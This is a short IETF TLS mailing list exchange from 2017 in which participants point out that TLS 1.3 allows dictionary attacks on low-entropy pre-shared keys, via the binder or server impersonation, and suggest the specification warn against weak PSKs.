On Tue, Apr 18, 2017 at 03:51:53PM -0400, Eric Rescorla wrote: > On Tue, Apr 18, 2017 at 3:41 PM, Ilari Liusvaara <ilariliusva...@welho.com> > wrote: > > > > On topic of PSKs, I noticed that TLS 1.3 makes it very easy to mount > > dictionary attacks against PSK, regardless of DHE-PSK (especially to > > recover the client PSK). I assumed that the document already documents > > this, but I couldn't find any remark that using low-entropy PSKs is very > > bad idea. > > > > Good point. As far as I can tell... > > 1. You can search the binder. > 2. Because we forbid PSK with server authentication, you can also > impersonate the server and then mount a dictionary attack (even w/o the > binder).
AFAICT, if I wanted to extract low-entropy client PSK, I wouldn't even bother with 2, since 1 seems so much more efficient (all passive too!).. Also, wonder if there are efficient ways of probing server PSKs (I didn't compe up with one, even in pure-PSK, due to binders making such probing nontrivial). -Ilari _______________________________________________ TLS mailing list TLS@ietf.org https://www.ietf.org/mailman/listinfo/tls
